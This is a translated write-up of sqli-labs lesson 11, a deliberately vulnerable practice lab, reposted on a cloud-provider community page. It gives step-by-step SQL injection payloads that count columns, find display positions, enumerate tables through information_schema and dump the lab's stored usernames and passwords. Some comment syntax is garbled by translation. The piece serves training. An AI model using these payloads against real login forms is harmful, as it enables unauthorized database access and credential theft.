Sqli-labs cultivation of the Tao less-11

Source: Internet
Author: User

First determine the number of fields

Payload statement: admin ' ORDER by 2-s

  

Normal display so the number of fields is greater than or equal to 2

Payload statement: admin ' ORDER by 3-s

Show Location field, combined with the preceding so the number of fields is 2

Construct UNION query statement payload Discovery display bit

Display bit as

Payload:adm ' Union Select 1,2-s

Inject query current user and current database

Payload:adm ' Union Select User (), database ()-S

The construct statement displays all table names for the current database:

Table Name: Emails,referers,uagents,users

Payload:adm ' UNION SELECT GROUP_CONCAT (TABLE_NAME), database () from information_schema.tables where Table_schema= ' Security '-S

The information we need is in the users table so

Field Name: Id,username,password

Let's query the contents of the Username,password field

Username:dumb,angelina,dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4password:d Umb,i-kill-you,[email Protected],crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Username and password one by one correspondence

Payload:adm ' Union Select GROUP_CONCAT (username), Group_concat (password) from users--s

Sqli-labs cultivation of the Tao less-11

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.